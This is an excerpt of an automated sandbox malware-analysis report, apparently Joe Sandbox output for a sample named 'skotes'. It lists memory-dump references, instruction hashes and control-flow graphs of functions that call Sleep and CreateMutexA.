                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211984440.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212007165.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212027388.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212053040.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212075033.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212095083.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212115749.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212138577.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212161657.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212180221.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212199603.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212223956.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212244847.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212268954.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212291358.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212321805.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212339734.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212359612.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212381992.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212404685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212433729.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212455415.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212476561.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212499490.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212524826.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212560156.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212583740.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212604897.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212630026.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212709439.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212732275.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212760073.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212785203.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212807860.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212829136.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212857506.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212879557.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: 6e3656eebeb2664ab0b7a587075c564c748f170777feef1f6256edc97a3af77b
                                                                                                                                                                • Instruction ID: f6cd4eca4ac889f762c92ff05d230208f7347db50885d08bca3ee05c75348c4b
                                                                                                                                                                • Opcode Fuzzy Hash: 6e3656eebeb2664ab0b7a587075c564c748f170777feef1f6256edc97a3af77b
                                                                                                                                                                • Instruction Fuzzy Hash: 49314A316042449BFF18AB78DC997ADB7E2EB86314F248699E054D73E1CB35A980C752

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 56 b8a079-b8a099 60 b8a09b-b8a0a7 56->60 61 b8a0c7-b8a0e3 56->61 62 b8a0a9-b8a0b7 60->62 63 b8a0bd-b8a0c4 call b9d663 60->63 64 b8a111-b8a130 61->64 65 b8a0e5-b8a0f1 61->65 62->63 68 b8a930 62->68 63->61 66 b8a15e-b8a916 call b980c0 64->66 67 b8a132-b8a13e 64->67 70 b8a0f3-b8a101 65->70 71 b8a107-b8a10e call b9d663 65->71 72 b8a140-b8a14e 67->72 73 b8a154-b8a15b call b9d663 67->73 76 b8a953-b8a994 Sleep CreateMutexA 68->76 77 b8a930 call bb6c6a 68->77 70->68 70->71 71->64 72->68 72->73 73->66 85 b8a996-b8a998 76->85 86 b8a9a7-b8a9a8 76->86 77->76 85->86 88 b8a99a-b8a9a5 85->88 88->86
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2211661900.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.2211642134.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211661900.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211726487.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211745385.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211766707.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211882784.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211908376.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211984440.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212007165.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212027388.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212053040.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212075033.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212095083.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212115749.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212138577.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212161657.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212180221.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212199603.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212223956.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212244847.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212268954.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212291358.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212321805.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212339734.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212359612.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212381992.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212404685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212433729.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212455415.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212476561.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212499490.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212524826.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212560156.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212583740.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212604897.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212630026.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212709439.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212732275.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212760073.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212785203.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212807860.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212829136.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212857506.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212879557.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: bcad80c4da625ea6b930a27833432d3401bd8fd7821c4dd8ee37dc5768bceb35
                                                                                                                                                                • Instruction ID: 11558ce7b1d1911c522c6be874d37a6309b113f523419f76a11a3cb68ce31112
                                                                                                                                                                • Opcode Fuzzy Hash: bcad80c4da625ea6b930a27833432d3401bd8fd7821c4dd8ee37dc5768bceb35
                                                                                                                                                                • Instruction Fuzzy Hash: BF312A316041049BFB08BB78DCC97ADB7E2EB86314F24829AE054E73E1CB359980C752

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 90 b8a1ae-b8a1ce 94 b8a1fc-b8a218 90->94 95 b8a1d0-b8a1dc 90->95 98 b8a21a-b8a226 94->98 99 b8a246-b8a265 94->99 96 b8a1de-b8a1ec 95->96 97 b8a1f2-b8a1f9 call b9d663 95->97 96->97 102 b8a935 96->102 97->94 104 b8a228-b8a236 98->104 105 b8a23c-b8a243 call b9d663 98->105 100 b8a293-b8a916 call b980c0 99->100 101 b8a267-b8a273 99->101 107 b8a289-b8a290 call b9d663 101->107 108 b8a275-b8a283 101->108 110 b8a953-b8a994 Sleep CreateMutexA 102->110 111 b8a935 call bb6c6a 102->111 104->102 104->105 105->99 107->100 108->102 108->107 119 b8a996-b8a998 110->119 120 b8a9a7-b8a9a8 110->120 111->110 119->120 122 b8a99a-b8a9a5 119->122 122->120
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2211661900.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.2211642134.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211661900.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211726487.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211745385.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211766707.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211882784.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211908376.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211984440.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212007165.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212027388.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212053040.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212075033.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212095083.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212115749.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212138577.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212161657.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212180221.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212199603.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212223956.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212244847.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212268954.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212291358.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212321805.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212339734.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212359612.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212381992.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212404685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212433729.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212455415.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212476561.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212499490.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212524826.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212560156.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212583740.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212604897.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212630026.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212709439.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212732275.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212760073.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212785203.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212807860.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212829136.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212857506.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212879557.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: 4059aa12aa17c3c27220e57023197437c577d1d3b940ca0138dce6b4bd0f564a
                                                                                                                                                                • Instruction ID: 61e61fd51b50fc7e03994564c2385b61e8fce7cca27da545ffed0fee7dfb2416
                                                                                                                                                                • Opcode Fuzzy Hash: 4059aa12aa17c3c27220e57023197437c577d1d3b940ca0138dce6b4bd0f564a
                                                                                                                                                                • Instruction Fuzzy Hash: A1310931A041409FFB18BB68DCC976DB7E2EB86314F24829AE054973E1DB759980C752

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 124 b8a418-b8a438 128 b8a43a-b8a446 124->128 129 b8a466-b8a482 124->129 130 b8a448-b8a456 128->130 131 b8a45c-b8a463 call b9d663 128->131 132 b8a4b0-b8a4cf 129->132 133 b8a484-b8a490 129->133 130->131 136 b8a93f-b8a994 call bb6c6a * 4 Sleep CreateMutexA 130->136 131->129 134 b8a4fd-b8a916 call b980c0 132->134 135 b8a4d1-b8a4dd 132->135 138 b8a492-b8a4a0 133->138 139 b8a4a6-b8a4ad call b9d663 133->139 141 b8a4df-b8a4ed 135->141 142 b8a4f3-b8a4fa call b9d663 135->142 160 b8a996-b8a998 136->160 161 b8a9a7-b8a9a8 136->161 138->136 138->139 139->132 141->136 141->142 142->134 160->161 162 b8a99a-b8a9a5 160->162 162->161
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2211661900.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.2211642134.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211661900.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211726487.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211745385.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211766707.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211882784.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211908376.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211984440.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212007165.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212027388.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212053040.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212075033.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212095083.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212115749.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212138577.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212161657.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212180221.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212199603.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212223956.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212244847.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212268954.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212291358.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212321805.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212339734.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212359612.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212381992.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212404685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212433729.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212455415.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212476561.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212499490.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212524826.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212560156.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212583740.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212604897.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212630026.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212709439.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212732275.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212760073.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212785203.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212807860.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212829136.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212857506.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212879557.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
